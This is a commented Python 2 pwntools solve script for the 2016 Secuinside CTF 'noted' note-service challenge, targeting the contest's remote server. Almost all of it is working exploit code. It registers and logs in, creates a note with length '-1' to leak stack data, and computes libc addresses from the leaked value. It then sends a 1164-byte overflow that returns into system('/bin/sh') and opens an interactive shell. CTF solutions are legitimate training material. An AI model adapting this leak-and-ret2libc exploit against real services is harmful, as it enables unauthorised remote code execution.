2016 secuinside noted
# by St1tch
#
# CTF solve script for the 2016 secuinside "noted" challenge (see the title
# above).  It drives the challenge's menu-based note service over a pwntools
# socket: register, log in, write a note, then read what the edit prompt
# echoes back and send one final edit.  Everything here is Python 2
# (raw_input, str-typed socket data); under Python 3 pwntools returns bytes
# and the find()/slicing on `stack` below would need b'' literals.
from pwn import *
import stitch  # project-local helper; only referenced in the commented-out dump below

# Target selection.  The three offsets are all measured from one common base
# that main() recovers from the leaked 'read35' value (see d_offset), so the
# whole table must come from the same binary/library build as the target.
local = False
if local :
    s = remote('localhost', 9999)
    offset = {'read35' : 0xd5c23, 'system' : 0x3ad80, 'binsh' : 0x15ba3f}
    raw_input('ready!')  # pause so a debugger can be attached locally
else :
    s = remote('chal.cykor.kr', 20003)
    offset = {'read35' : 0xd4443, 'system' : 0x3a920, 'binsh' : 0x15909f}

def reg_login(menu, myid, mypw) :
    """Answer one register/login menu round.

    menu  -- menu choice sent as a line ('2' = register, '1' = login, per
             the calls in main)
    myid  -- id sent at the first ' : ' prompt
    mypw  -- password sent at the second ' : ' prompt
    """
    global s  # `s` is only read here; the global declaration is not needed
    s.recvuntil('\n\n')
    s.sendline(menu)
    s.recvuntil(' : ')
    s.sendline(myid)
    s.recvuntil(' : ')
    s.sendline(mypw)

def n_write(title, d_len, pw) :
    """Create a note via menu item '2'.

    title -- note title
    d_len -- note length, sent verbatim as a string (main passes '-1';
             presumably this is what makes the later edit prompt echo stack
             data -- inferred from the '#lick' comment, not shown here)
    pw    -- per-note password
    """
    global s  # read-only use; `global` is not required
    s.recvuntil('\n\n')
    s.sendline('2')
    s.recvuntil(' : ')
    s.sendline(title)
    s.recvuntil(' : ')
    s.sendline(d_len)
    s.recvuntil(' : ')
    s.sendline(pw)
    log.info('Write note! %s'%title)

def n_edit(title, title_pw, payload) :
    """Edit a note via menu item '4' and return the raw bytes the service
    printed between the password prompt and the 'size) : ' prompt.

    title    -- note title
    title_pw -- the note's password
    payload  -- new note body; when non-empty the script hands the socket
                to the user (s.interactive()) after sending it
    Returns the text received up to and including 'size) : ' (named
    `stack` because main treats it as leaked stack contents).
    """
    global s  # read-only use; `global` is not required
    s.recvuntil('\n\n')
    s.sendline('4')
    s.recvuntil(' : ')
    s.sendline(title)
    s.recvuntil(' : ')
    s.sendline(title_pw)
    stack = s.recvuntil('size) : ')
    s.sendline(payload)
    log.info('Edit note! %s'%title)
    if payload :
        log.info('Exploit!')
        s.interactive()
    return stack

if __name__ == '__main__' :
    myid = mypw = 'stitch'
    title = title_pw = 'ukuk'
    reg_login('2', myid, mypw) #register
    reg_login('1', myid, mypw) #login
    log.info('login %s'%myid)
    n_write(title, '-1', title_pw) #lick
    # First edit with an empty body: only used to capture the echoed data.
    stack = n_edit(title, title_pw, '')
    #stitch.dump_str(stack)
    # Locate the title fragment 'uk' in the echoed data and step 136 bytes
    # past it; the 4 bytes just before that point are read as a 32-bit LE
    # value.  Both 136 and the meaning of that value ('read35') come from
    # the author's analysis and are not derivable from this script alone.
    ebp = stack.find('uk') + 136
    read35 = u32(stack[ebp-4:ebp])
    # Common base = leaked value minus its known offset; the other two
    # addresses are then rebased with the same delta.
    d_offset = read35 - offset['read35']
    system = d_offset + offset['system']
    binsh = d_offset + offset['binsh']
    #send payload and exploit
    # 1164 bytes of filler followed by the two computed addresses separated
    # by 4 bytes; the filler length is another hard-coded constant from the
    # author's analysis of the target binary.
    pay = 'a' * 1164
    pay += p32(system)
    pay += 'a' * 4
    pay += p32(binsh)
    n_edit(title, title_pw, pay)